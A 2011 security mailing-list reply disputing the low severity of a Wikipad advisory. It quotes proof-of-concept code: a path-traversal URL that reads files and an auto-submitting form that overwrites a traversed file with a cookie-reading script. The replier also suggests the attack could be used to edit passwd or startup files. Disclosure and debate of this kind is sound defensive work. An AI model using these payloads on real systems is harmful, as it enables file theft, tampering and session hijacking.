[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: HTB22827: File Content Disclosure in Wikipad
- To: advisory@xxxxxxxxxxx
- Subject: Re: HTB22827: File Content Disclosure in Wikipad
- From: security curmudgeon <jericho@xxxxxxxxxxxxx>
- Date: Fri, 29 Apr 2011 00:02:43 -0500 (CDT)
: Vulnerability ID: HTB22827
: Reference:
http://www.htbridge.ch/advisory/file_content_disclosure_in_wikipad.html
: Vulnerability Type: File Content Disclosure
: Risk level: Low
: Vulnerability Details:
: The vulnerability exists due to failure in the "/pages.php" script to
properly sanitize user-supplied input in "id" variable. We can disclose content
of ".txt" files on file system.
:
: The following PoC is available:
: http://host/pages.php?id=./../../../../../txt_file
So you can dump the contents of an arbitrary file, presumably outside the
web root, and this is 'Low' severity? Ok, perhaps authentication is
required or something else makes it a bit tricky..
: Also, we can change content of this file by using PoC:
:
: <form
action="http://host/pages.php?action=edit&id=./../../../../../txt_file&title=test";
method="post" name="main">
: <input type="hidden" name="data[text]" value='new
content"><script>alert(document.cookie)</script>'>
: </form>
:
: <script>
: document.main.submit();
: </script>
Now you can *edit* any file on the system, and this is 'Low' severity?
Worse, you throw in some script code instead of editing something a bit
more serious like editing a system startup file, passwd or some other form
of remote access?
At the very least, this would be 'Medium' by most standards.